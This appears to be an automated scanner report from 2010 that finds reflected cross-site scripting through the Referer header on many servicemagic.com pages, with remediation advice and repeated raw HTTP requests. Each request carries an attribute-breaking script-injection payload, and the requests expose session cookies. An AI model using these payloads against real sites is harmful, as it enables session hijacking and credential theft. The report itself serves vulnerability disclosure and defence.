Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7424"><script>alert(1)</script>6128b904e50 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.servicemagic.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psacn=; csdcn=1292169102045; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; psdcn=0; csacn=746971; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=223974937.793327017.1292169109.1292169109.1292169109.1; _chartbeat2=knuzeirfjkixxrjl
Referer: http://www.google.com/search?hl=en&q=d7424"><script>alert(1)</script>6128b904e50
Response
HTTP/1.0 200 OK
Set-Cookie: ServerID=1211; path=/
Date: Tue, 14 Dec 2010 19:16:43 GMT
Server: Apache/2
Set-Cookie: JSESSIONID=08C2A6CA4BE5833D024BCD23B900D8F2.workerpr011-1; Path=/
Set-Cookie: psacn=746971; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/
Set-Cookie: csdcn=1292354203830; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/
Set-Cookie: originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/
Set-Cookie: psdcn=1292169102045; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/
Set-Cookie: csacn=746971; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f578"><script>alert(1)</script>81a2b13766c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article.home-improvement-library.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=3f578"><script>alert(1)</script>81a2b13766c
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:17 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb38"><script>alert(1)</script>d6ba1e262a9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article.show.8-Basement-Remodeling-Essentials.10576.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=edb38"><script>alert(1)</script>d6ba1e262a9
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:11 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf9d"><script>alert(1)</script>5b3f4e97503 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article.show.Atlanta-Carpet-Installation.15686.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=5bf9d"><script>alert(1)</script>5b3f4e97503
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:14 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a94"><script>alert(1)</script>cb75317f49e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Atlanta.GA.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=a3a94"><script>alert(1)</script>cb75317f49e
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:46 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71a0"><script>alert(1)</script>cb6682e40fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Charlotte.NC.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=a71a0"><script>alert(1)</script>cb6682e40fa
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:41 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a8b"><script>alert(1)</script>881748bde26 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Chicago.IL.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=e4a8b"><script>alert(1)</script>881748bde26
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:58 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad68"><script>alert(1)</script>b9ab75c9315 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Cleveland.OH.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=fad68"><script>alert(1)</script>b9ab75c9315
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:59 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40bb5"><script>alert(1)</script>4635398da8b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Columbus.OH.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=40bb5"><script>alert(1)</script>4635398da8b
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:55 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91f10"><script>alert(1)</script>18c6c640ec3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Dallas.TX.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=91f10"><script>alert(1)</script>18c6c640ec3
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:54 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ab2"><script>alert(1)</script>f3fa1a57c71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Denver.CO.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=b2ab2"><script>alert(1)</script>f3fa1a57c71
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:54 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a673a"><script>alert(1)</script>896456e1914 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Houston.TX.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=a673a"><script>alert(1)</script>896456e1914
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:59 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978a0"><script>alert(1)</script>deb5be9dd76 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Indianapolis.IN.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=978a0"><script>alert(1)</script>deb5be9dd76
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:01 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2543d"><script>alert(1)</script>53604168ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Los_Angeles.CA.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=2543d"><script>alert(1)</script>53604168ed
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:53 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: ca
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44425"><script>alert(1)</script>eebaed718e6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Minneapolis.MN.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=44425"><script>alert(1)</script>eebaed718e6
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:00 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48428"><script>alert(1)</script>b7c6712ac0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.New_York.NY.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
